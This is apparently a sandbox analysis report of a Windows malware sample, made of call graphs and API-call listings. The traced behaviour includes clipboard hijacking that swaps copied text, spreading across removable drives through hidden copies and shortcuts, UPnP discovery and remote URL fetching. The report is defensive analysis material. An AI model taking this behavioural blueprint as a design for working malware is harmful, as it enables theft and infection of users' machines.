5567 40cb40 5586 40aa20 inet_ntoa 5567->5586 5569 40cb4c 5570 40cc10 InterlockedDecrement 5569->5570 5585 40ab40 shutdown closesocket 5570->5585 5572->5302 5573 409fa0 _invalid_parameter 7 API calls 5573->5575 5574 40ccf0 6 API calls 5574->5575 5575->5566 5575->5567 5575->5570 5575->5573 5575->5574 5577 40a1b0 __aligned_recalloc_base 3 API calls 5575->5577 5587 40b570 5575->5587 5577->5575 5579 40cdcd socket 5578->5579 5580 40cde2 htons connect 5579->5580 5581 40ce3f 5579->5581 5580->5581 5582 40ce2a 5580->5582 5581->5579 5583 40cafd 5581->5583 5601 40ab40 shutdown closesocket 5582->5601 5583->5565 5583->5572 5585->5572 5586->5569 5600 40b581 5587->5600 5590 40a1b0 __aligned_recalloc_base 3 API calls 5591 40b94f 5590->5591 5591->5575 5592 40b960 26 API calls 5592->5600 5594 40b59f 5594->5590 5596 40b520 18 API calls 5596->5600 5597 40ae80 31 API calls 5597->5600 5600->5592 5600->5594 5600->5596 5600->5597 5602 40bab0 5600->5602 5609 40b250 EnterCriticalSection 5600->5609 5614 406e90 5600->5614 5619 406f30 5600->5619 5624 406d60 5600->5624 5631 406e60 5600->5631 5601->5583 5603 40bac1 lstrlenA 5602->5603 5604 40c190 7 API calls 5603->5604 5608 40badf 5604->5608 5605 40baeb 5606 40bb6f 5605->5606 5607 40a1b0 __aligned_recalloc_base 3 API calls 5605->5607 5606->5600 5607->5606 5608->5603 5608->5605 5612 40b268 5609->5612 5610 40b2a4 LeaveCriticalSection 5610->5600 5612->5610 5634 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5612->5634 5613 40b293 5613->5610 5635 406ed0 5614->5635 5617 40d160 328 API calls 5618 406ec9 5617->5618 5618->5600 5620 406ed0 75 API calls 5619->5620 5621 406f4f 5620->5621 5622 406f7c 5621->5622 5650 406f90 5621->5650 5622->5600 5653 405fa0 EnterCriticalSection 5624->5653 5626 406d7a 5627 406dad 5626->5627 5658 406dc0 5626->5658 5627->5600 5630 40a1b0 __aligned_recalloc_base 3 API calls 5630->5627 5665 406060 EnterCriticalSection 5631->5665 5633 406e82 5633->5600 5634->5613 5638 406ee3 5635->5638 5636 406ea4 5636->5617 5636->5618 5638->5636 5639 405eb0 EnterCriticalSection 5638->5639 5640 40c820 71 API calls 5639->5640 5641 405ece 5640->5641 5642 405f8b LeaveCriticalSection 5641->5642 5643 405ee7 5641->5643 5646 405f08 5641->5646 5642->5638 5644 405ef1 memcpy 5643->5644 5645 405f06 5643->5645 5644->5645 5647 40a1b0 __aligned_recalloc_base 3 API calls 5645->5647 5646->5645 5649 405f66 memcpy 5646->5649 5648 405f88 5647->5648 5648->5642 5649->5645 5651 40b480 18 API calls 5650->5651 5652 406fd5 5651->5652 5652->5622 5654 405fbe 5653->5654 5655 40604a LeaveCriticalSection 5654->5655 5656 40a220 8 API calls 5654->5656 5655->5626 5657 40601c 5656->5657 5657->5655 5659 409fa0 _invalid_parameter 7 API calls 5658->5659 5660 406dd2 memcpy 5659->5660 5661 40b480 18 API calls 5660->5661 5662 406e3c 5661->5662 5663 40a1b0 __aligned_recalloc_base 3 API calls 5662->5663 5664 406da1 5663->5664 5664->5630 5690 40c880 5665->5690 5668 4062a3 LeaveCriticalSection 5668->5633 5669 40c820 71 API calls 5670 406099 5669->5670 5670->5668 5671 4060f4 memcpy 5670->5671 5673 4061b8 5670->5673 5674 40a1b0 __aligned_recalloc_base 3 API calls 5671->5674 5672 4061e1 5675 40a1b0 __aligned_recalloc_base 3 API calls 5672->5675 5673->5672 5676 405cf0 68 API calls 5673->5676 5677 406118 5674->5677 5678 406202 5675->5678 5676->5672 5679 40a220 8 API calls 5677->5679 5678->5668 5680 406211 CreateFileW 5678->5680 5681 406128 5679->5681 5680->5668 5682 406234 5680->5682 5683 40a1b0 __aligned_recalloc_base 3 API calls 5681->5683 5685 406251 WriteFile 5682->5685 5686 40628f FlushFileBuffers 5682->5686 5684 40614f 5683->5684 5687 40c190 7 API calls 5684->5687 5685->5682 5686->5668 5688 406185 5687->5688 5689 407310 64 API calls 5688->5689 5689->5673 5693 40bdd0 5690->5693 5697 40bde1 5693->5697 5694 40a220 8 API calls 5694->5697 5695 40bdfb 5698 40a1b0 __aligned_recalloc_base 3 API calls 5695->5698 5696 40bd30 70 API calls 5696->5697 5697->5694 5697->5695 5697->5696 5700 407af0 68 API calls 5697->5700 5701 40be3b memcmp 5697->5701 5699 406082 5698->5699 5699->5668 5699->5669 5700->5697 5701->5695 5701->5697 5707 407490 5702->5707 5703 4074b8 Sleep 5703->5707 5704 40756a Sleep 5704->5707 5705 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5733 40ea30 InternetOpenA 5705->5733 5707->5703 5707->5704 5707->5705 5708 40eae0 56 API calls 5707->5708 5708->5707 5710 405889 memset GetModuleHandleW 5709->5710 5711 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5710->5711 5711->5711 5712 405900 CreateWindowExW 5711->5712 5713 40592b 5712->5713 5714 40592d GetMessageA 5712->5714 5715 40595f ExitThread 5713->5715 5716 405941 TranslateMessage DispatchMessageA 5714->5716 5717 405957 5714->5717 5716->5714 5717->5710 5717->5715 5740 40e770 CreateFileW 5718->5740 5720 406bf0 5721 406d48 ExitThread 5720->5721 5723 406d38 Sleep 5720->5723 5724 406c29 5720->5724 5743 4063a0 GetLogicalDrives 5720->5743 5723->5720 5749 4062c0 5724->5749 5727 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5728 406cd6 wsprintfW 5727->5728 5729 406ceb wsprintfW 5727->5729 5728->5729 5755 4066b0 _chkstk 5729->5755 5730 406c5b 5734 40ea56 InternetOpenUrlA 5733->5734 5735 40eac8 Sleep 5733->5735 5736 40ea75 HttpQueryInfoA 5734->5736 5737 40eabe InternetCloseHandle 5734->5737 5735->5707 5738 40eab4 InternetCloseHandle 5736->5738 5739 40ea9e 5736->5739 5737->5735 5738->5737 5739->5738 5741 40e7b8 5740->5741 5742 40e79f GetFileSize 5740->5742 5741->5720 5742->5741 5746 4063cd 5743->5746 5744 406446 5744->5720 5745 4063dc RegOpenKeyExW 5745->5746 5747 4063fe RegQueryValueExW 5745->5747 5746->5744 5746->5745 5748 40643a RegCloseKey 5746->5748 5747->5746 5747->5748 5748->5746 5750 406319 5749->5750 5751 4062dc 5749->5751 5750->5727 5750->5730 5792 406320 GetDriveTypeW 5751->5792 5754 40630b lstrcpyW 5754->5750 5756 4066c7 5755->5756 5757 4066ce 6 API calls 5755->5757 5756->5730 5758 406782 5757->5758 5759 4067c4 PathFileExistsW 5757->5759 5762 40e770 2 API calls 5758->5762 5760 406874 PathFileExistsW 5759->5760 5761 4067d9 PathFileExistsW 5759->5761 5765 406885 5760->5765 5766 4068ca FindFirstFileW 5760->5766 5763 406809 PathFileExistsW 5761->5763 5764 4067ea SetFileAttributesW DeleteFileW 5761->5764 5767 40678e 5762->5767 5769 40681a CreateDirectoryW 5763->5769 5770 40683c PathFileExistsW 5763->5770 5764->5763 5771 4068a5 5765->5771 5772 40688d 5765->5772 5766->5756 5768 4068f1 5766->5768 5767->5759 5773 4067a5 SetFileAttributesW DeleteFileW 5767->5773 5774 4069b3 lstrcmpW 5768->5774 5783 406b8a FindNextFileW 5768->5783 5785 406a0f lstrcmpiW 5768->5785 5786 406a76 PathMatchSpecW 5768->5786 5787 406af4 PathFileExistsW 5768->5787 5801 406570 CreateDirectoryW wsprintfW FindFirstFileW 5768->5801 5769->5770 5775 40682d SetFileAttributesW 5769->5775 5770->5760 5776 40684d CopyFileW 5770->5776 5778 406460 3 API calls 5771->5778 5797 406460 CoInitialize CoCreateInstance 5772->5797 5773->5759 5774->5768 5779 4069c9 lstrcmpW 5774->5779 5775->5770 5776->5760 5780 406865 SetFileAttributesW 5776->5780 5781 4068a0 SetFileAttributesW 5778->5781 5779->5768 5780->5760 5781->5766 5783->5774 5784 406ba6 FindClose 5783->5784 5784->5756 5785->5768 5786->5768 5788 406a97 wsprintfW SetFileAttributesW DeleteFileW 5786->5788 5787->5768 5789 406b0a wsprintfW wsprintfW 5787->5789 5788->5768 5789->5768 5790 406b74 MoveFileExW 5789->5790 5790->5783 5793 406348 5792->5793 5796 4062ff 5792->5796 5794 40635c QueryDosDeviceW 5793->5794 5793->5796 5795 406376 StrCmpNW 5794->5795 5794->5796 5795->5796 5796->5750 5796->5754 5798 406496 5797->5798 5800 4064d2 5797->5800 5799 4064a0 wsprintfW 5798->5799 5798->5800 5799->5800 5800->5781 5802 4065c5 lstrcmpW 5801->5802 5803 40669f 5801->5803 5804 4065db lstrcmpW 5802->5804 5808 4065f1 5802->5808 5803->5768 5805 4065f3 wsprintfW wsprintfW 5804->5805 5804->5808 5807 406656 MoveFileExW 5805->5807 5805->5808 5806 40666c FindNextFileW 5806->5802 5809 406688 FindClose RemoveDirectoryW 5806->5809 5807->5806 5808->5806 5809->5803 5810 405970 GetWindowLongW 5811 405994 5810->5811 5812 4059b6 5810->5812 5813 4059a1 5811->5813 5814 405a27 IsClipboardFormatAvailable 5811->5814 5818 405a06 5812->5818 5819 4059ee SetWindowLongW 5812->5819 5822 4059b1 5812->5822 5815 4059c4 SetClipboardViewer SetWindowLongW 5813->5815 5816 4059a7 5813->5816 5820 405a43 IsClipboardFormatAvailable 5814->5820 5821 405a3a 5814->5821 5817 405ba4 DefWindowProcA 5815->5817 5816->5822 5823 405b5d RegisterRawInputDevices ChangeClipboardChain 5816->5823 5818->5822 5824 405a0c SendMessageA 5818->5824 5819->5822 5820->5821 5825 405a58 IsClipboardFormatAvailable 5820->5825 5826 405a75 OpenClipboard 5821->5826 5827 405b3f 5821->5827 5822->5817 5823->5817 5824->5822 5825->5821 5826->5827 5828 405a85 GetClipboardData 5826->5828 5827->5822 5829 405b45 SendMessageA 5827->5829 5828->5822 5830 405a9d GlobalLock 5828->5830 5829->5822 5830->5822 5831 405ab5 5830->5831 5832 405ac8 5831->5832 5833 405ae9 5831->5833 5835 405afe 5832->5835 5836 405ace 5832->5836 5834 405690 13 API calls 5833->5834 5837 405ad4 GlobalUnlock CloseClipboard 5834->5837 5852 4057b0 5835->5852 5836->5837 5846 405570 5836->5846 5837->5827 5841 405b27 5837->5841 5860 404970 lstrlenW 5841->5860 5844 40a1b0 __aligned_recalloc_base 3 API calls 5845 405b3c 5844->5845 5845->5827 5847 40557b 5846->5847 5848 405581 lstrlenW 5847->5848 5849 405594 5847->5849 5850 409fa0 _invalid_parameter 7 API calls 5847->5850 5851 4055b1 lstrcpynW 5847->5851 5848->5847 5848->5849 5849->5837 5850->5847 5851->5847 5851->5849 5857 4057bd 5852->5857 5853 4057c3 lstrlenA 5853->5857 5858 4057d6 5853->5858 5854 405630 2 API calls 5854->5857 5855 409fa0 _invalid_parameter 7 API calls 5855->5857 5857->5853 5857->5854 5857->5855 5857->5858 5859 40a1b0 __aligned_recalloc_base 3 API calls 5857->5859 5894 405760 5857->5894 5858->5837 5859->5857 5863 4049a4 5860->5863 5861 404bee 5861->5844 5862 404dbb StrStrW 5865 404dd2 StrStrW 5862->5865 5866 404dce 5862->5866 5863->5861 5864 404c00 5863->5864 5871 404d30 StrStrW 5863->5871 5864->5861 5864->5862 5867 404de5 5865->5867 5868 404de9 StrStrW 5865->5868 5866->5865 5867->5868 5869 404dfc 5868->5869 5876 404e12 5869->5876 5899 4048a0 lstrlenW 5869->5899 5871->5864 5872 404d58 StrStrW 5871->5872 5872->5864 5873 404d80 StrStrW 5872->5873 5873->5864 5874 40539b StrStrW 5875 4053b7 StrStrW 5874->5875 5879 4053ae StrStrW 5874->5879 5878 4053d3 StrStrW 5875->5878 5875->5879 5876->5861 5876->5874 5876->5879 5878->5879 5880 405470 StrStrW 5879->5880 5881 405469 5879->5881 5882 405483 5880->5882 5883 40548a StrStrW 5880->5883 5881->5880 5882->5883 5884 4054a4 StrStrW 5883->5884 5885 40549d 5883->5885 5886 4054b7 5884->5886 5887 4054be StrStrW 5884->5887 5885->5884 5886->5887 5888 4054d1 5887->5888 5889 4054d8 lstrlenA 5887->5889 5888->5889 5889->5861 5890 4054eb GlobalAlloc 5889->5890 5890->5861 5891 405506 GlobalLock 5890->5891 5891->5861 5892 405519 memcpy GlobalUnlock OpenClipboard 5891->5892 5892->5861 5893 405546 EmptyClipboard SetClipboardData CloseClipboard 5892->5893 5893->5861 5895 40576b 5894->5895 5896 405771 lstrlenA 5895->5896 5897 405630 2 API calls 5895->5897 5898 4057a4 5895->5898 5896->5895 5897->5895 5898->5857 5902 4048c4 5899->5902 5900 404911 iswalpha 5900->5902 5903 40492c iswdigit 5900->5903 5901 40490d 5901->5876 5902->5900 5902->5901 5902->5903 5903->5902 5931 40d4d0 5932 40b570 328 API calls 5931->5932 5933 40d508 5932->5933 5934 40d0d0 5939 401b60 5934->5939 5936 40d0e5 5937 401b60 16 API calls 5936->5937 5938 40d104 5936->5938 5937->5938 5940 401c42 5939->5940 5941 401b70 5939->5941 5940->5936 5941->5940 5942 409d90 7 API calls 5941->5942 5943 401b9d 5942->5943 5943->5940 5944 40a220 8 API calls 5943->5944 5945 401bc9 5944->5945 5946 401be6 5945->5946 5947 401bd6 5945->5947 5949 401ae0 4 API calls 5946->5949 5948 40a1b0 __aligned_recalloc_base 3 API calls 5947->5948 5950 401bdc 5948->5950 5951 401bf3 5949->5951 5950->5936 5952 401c33 5951->5952 5953 401bfc EnterCriticalSection 5951->5953 5954 40a1b0 __aligned_recalloc_base 3 API calls 5952->5954 5955 401c13 5953->5955 5956 401c1f LeaveCriticalSection 5953->5956 5957 401c3c 5954->5957 5955->5956 5956->5936 5958 40a1b0 __aligned_recalloc_base 3 API calls 5957->5958 5958->5940 5959 40ca90 5964 40ad40 5959->5964 5962 40caba 5963 40cad0 328 API calls 5963->5962 5965 40add0 2 API calls 5964->5965 5966 40ad4f 5965->5966 5967 40ad59 5966->5967 5968 40ad5d EnterCriticalSection 5966->5968 5967->5962 5967->5963 5970 40ad7c LeaveCriticalSection 5968->5970 5970->5967 5971 40cf50 5972 40cf66 5971->5972 5986 40cfbe 5971->5986 5973 40cf70 5972->5973 5974 40cfc3 5972->5974 5975 40d013 5972->5975 5972->5986 5976 409d90 7 API calls 5973->5976 5978 40cfe8 5974->5978 5979 40cfdb InterlockedDecrement 5974->5979 5998 40bbc0 5975->5998 5981 40cf7d 5976->5981 5980 40a1b0 __aligned_recalloc_base 3 API calls 5978->5980 5979->5978 5982 40cff4 5980->5982 5994 4023d0 5981->5994 5984 40a1b0 __aligned_recalloc_base 3 API calls 5982->5984 5984->5986 5987 40ad40 4 API calls 5988 40cf9f 5987->5988 5988->5986 5989 40cfab InterlockedIncrement 5988->5989 5989->5986 5991 40d071 IsBadReadPtr 5992 40d039 5991->5992 5992->5986 5992->5991 5993 40b570 328 API calls 5992->5993 6003 40bcc0 5992->6003 5993->5992 5995 402413 5994->5995 5996 4023d9 5994->5996 5995->5987 5996->5995 5997 4023ea InterlockedIncrement 5996->5997 5997->5995 5999 40bbd3 5998->5999 6000 40bbfd memcpy 5998->6000 6001 409fe0 9 API calls 5999->6001 6000->5992 6002 40bbf4 6001->6002 6002->6000 6004 40bce9 6003->6004 6005 40bcde 6003->6005 6004->6005 6006 40bd01 memmove 6004->6006 6005->5992 6006->6005 6046 40ee74 6047 40ee7c 6046->6047 6048 40ef30 6047->6048 6052 40f0b1 6047->6052 6051 40eeb5 6051->6048 6056 40ef9c RtlUnwind 6051->6056 6054 40f0c6 6052->6054 6055 40f0e2 6052->6055 6053 40f151 NtQueryVirtualMemory 6053->6055 6054->6053 6054->6055 6055->6051 6055->6055 6057 40efb4 6056->6057 6057->6051 6007 406c16 6011 406bf8 6007->6011 6008 406d38 Sleep 6008->6011 6009 406c29 6010 4062c0 4 API calls 6009->6010 6015 406c3a 6010->6015 6011->6008 6011->6009 6012 406d48 ExitThread 6011->6012 6013 4063a0 4 API calls 6011->6013 6013->6011 6014 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6016 406cd6 wsprintfW 6014->6016 6017 406ceb wsprintfW 6014->6017 6015->6014 6018 406c5b 6015->6018 6016->6017 6019 4066b0 51 API calls 6017->6019 6019->6018 6058 406a39 6060 4069df 6058->6060 6059 406a0f lstrcmpiW 6059->6060 6060->6059 6061 406b8a FindNextFileW 6060->6061 6062 406a76 PathMatchSpecW 6060->6062 6065 406af4 PathFileExistsW 6060->6065 6071 406570 11 API calls 6060->6071 6063 4069b3 lstrcmpW 6061->6063 6064 406ba6 FindClose 6061->6064 6062->6060 6067 406a97 wsprintfW SetFileAttributesW DeleteFileW 6062->6067 6063->6060 6066 4069c9 lstrcmpW 6063->6066 6068 406bb3 6064->6068 6065->6060 6069 406b0a wsprintfW wsprintfW 6065->6069 6066->6060 6067->6060 6069->6060 6070 406b74 MoveFileExW 6069->6070 6070->6061 6071->6060 6072 40757a ExitThread 6073 40ee7c 6074 40ee9a 6073->6074 6076 40ef30 6073->6076 6075 40f0b1 NtQueryVirtualMemory 6074->6075 6078 40eeb5 6075->6078 6077 40ef9c RtlUnwind 6077->6078 6078->6076 6078->6077 6079 405f7d 6081 405f11 6079->6081 6080 405f7b 6082 40a1b0 __aligned_recalloc_base 3 API calls 6080->6082 6081->6080 6084 405f66 memcpy 6081->6084 6083 405f88 LeaveCriticalSection 6082->6083 6084->6080

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 324 402020-402032 call 409d90 327 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 324->327 328 4021aa-4021ae 324->328 329 402076-402089 CreateIoCompletionPort 327->329 330 40219f-4021a8 call 401600 327->330 329->330 331 40208f-402099 call 40d130 329->331 330->328 331->330 336 40209f-4020b7 WSASocketA 331->336 336->330 337 4020bd-402120 setsockopt htons bind 336->337 337->330 338 402126-402138 listen 337->338 338->330 339 40213a-402145 WSACreateEvent 338->339 339->330 340 402147-402157 WSAEventSelect 339->340 340->330 341 402159-40215f 340->341 342 402161-402171 call 40d160 341->342 343 40217f-40218f call 40d160 341->343 346 402176-40217d 342->346 347 402194-40219e 343->347 346->342 346->343
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                                                                                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                                                                                                                                    • Opcode ID: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
                                                                                                                                                                                                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aaa01092ab68818f2c6086df037ff4d5fe56567f8ac19d07e2acd010698dc1e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 365 40d710-40d737 socket 366 40d871-40d875 365->366 367 40d73d-40d805 htons inet_addr setsockopt call 40aa80 bind lstrlenA sendto ioctlsocket 365->367 368 40d877-40d87d 366->368 369 40d87f-40d885 366->369 372 40d80b-40d812 367->372 368->369 373 40d814-40d823 call 40d890 372->373 374 40d865-40d869 call 40ab40 372->374 378 40d828-40d830 373->378 377 40d86e 374->377 377->366 379 40d832 378->379 380 40d834-40d863 call 409fe0 378->380 379->374 380->372
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                                                                                                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                    • String ID: 239.255.255.250
                                                                                                                                                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                                                                                                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                                                                                                                                    • Opcode ID: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
                                                                                                                                                                                                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
